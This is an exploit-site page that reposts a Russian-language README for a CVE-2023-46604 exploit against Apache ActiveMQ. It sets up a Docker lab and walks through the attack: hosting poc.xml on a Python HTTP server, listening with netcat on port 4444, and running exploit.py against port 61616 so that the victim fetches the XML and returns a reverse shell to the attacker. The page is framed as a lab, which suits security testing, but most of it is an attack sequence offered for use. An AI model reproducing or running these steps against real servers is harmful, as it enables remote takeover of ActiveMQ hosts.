Sploitus

Exploit for CVE-2023-46604

kitploit · 2026-08-25

Exploit Code

MARKDOWN23 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CUANH2333-CVE-2023-46604
CVE-2023-46604

![image](https://assets.kitploit.com/production/public/readmes/24112/a79e9f37940aefd20fdf1b0cee02466097967b3476180bf4637c80791cf2404a.png)

Создайте docker-compose, содержащий два образа: машина жертвы и машина цели в соответствии с требуемой средой. На машине жертвы запустите ActiveMQ.

Переключаемся на машину атакующего: • Запустите HTTP-сервис для отправки PoC: python3 -m http.server 

• Используйте netcat для прослушивания входящих подключений к машине атакующего: nc -nlvp 4444

• Отправьте полезную нагрузку для создания обратного подключения reverse shell к машине атакующего: python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml Где:

  * Exploit.py: файл с кодом эксплуатации уязвимости
  * -i 172.18.0.3: IP-адрес машины, отправляющей полезную нагрузку
  * -p 61616: порт, на котором ActiveMQ машины жертвы прослушивает соединения
  * \--xml http://172.18.0.2:8000/poc.xml: URL-адрес файла poc.xml на машине атакующего



Можно заметить, что после вызова команды выполнения файла 'exploit.py', эксплойт отправляет пакет 'poc.xml' с веб-сервера на цель — адрес службы ActiveMQ, запущенной на сервере цели. При этом веб-сервер HTTP на машине атакующего также получает запрос, отправленный с IP-адреса машины цели.

После отправки полезной нагрузки переключитесь на терминал, прослушивающий порт 4444 на машине атакующего. Мы видим, что reverse shell с машины жертвы был отправлен обратно.